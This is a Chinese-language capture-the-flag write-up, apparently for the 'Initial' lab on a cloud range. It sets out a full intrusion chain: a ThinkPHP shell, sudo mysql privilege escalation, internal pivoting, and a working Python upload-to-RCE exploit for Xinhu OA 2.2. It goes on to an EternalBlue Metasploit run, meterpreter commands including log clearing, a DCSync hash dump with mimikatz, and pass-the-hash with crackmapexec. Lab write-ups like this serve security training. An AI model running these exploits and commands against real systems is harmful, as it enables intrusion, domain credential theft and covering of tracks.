flag1
第一步用tscan扫描指纹发现是thinkphp
然后直接getshell

蚁剑连接后sudo -l发现mysql提权

1
| sudo mysql -e '\! find / -type f -name "*flag*" 2>/dev/null'
|
然后得到flag1
flag2
传入fscan来扫描一下内网
然后用stowaway做一个内网穿透

弱口令可以进入到这里
然后是信呼协同办公2.2版本的文件上传
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
| import requests
session = requests.session()
url_pre = 'http://url/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = { 'rempass': '0', 'jmpass': 'false', 'device': '1625884034525', 'ltype': '0', 'adminuser': 'dGVzdA::', 'adminpass': 'YWJjMTIz', 'yanzm': '' }
r = session.post(url1, data=data1) r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath']) filepath = "/" + filepath.split('.uptemp')[0] + '.php' id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3) r = session.get(url_pre + filepath + "?1=system('whoami');") print(r.text)
|
记得改账户密码

蚁剑连接上,查看flag2
flag3

我们可以试一下永恒之蓝
配置好kali的代理
启动msf
选好模块,配置好ip进行攻击
1 2 3 4
| use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21 exploit
|

1 2 3 4 5
| meterpreter > screenshot # 捕获屏幕 meterpreter > upload hello.txt c:// #上传文件 meterpreter > download d://1.txt # 下载文件 meterpreter > shell # 获取cmd meterpreter > clearev # 清除日志
|
这里是一些命令
但是这里没有flag,还有一个可利用的点就是

这里有一个dc的域控制器,需要打DCSync
这里直接贴一位佬的介绍了


这里我们符合条件打dcsync,输入一下命令获取用户的hash
1 2
| load kiwi # 调用mimikatz模块 kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)
|

获取到用户的hash
接下来我们需要使用crackmapexec来进行哈希传递攻击,从而实现在dc域控上的任意命令执行来获得flag3
1
| crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
|

1
| flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
|
参考:https://9anux.org/2024/08/01/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83Initial%E8%AF%A6%E8%A7%A3/index.html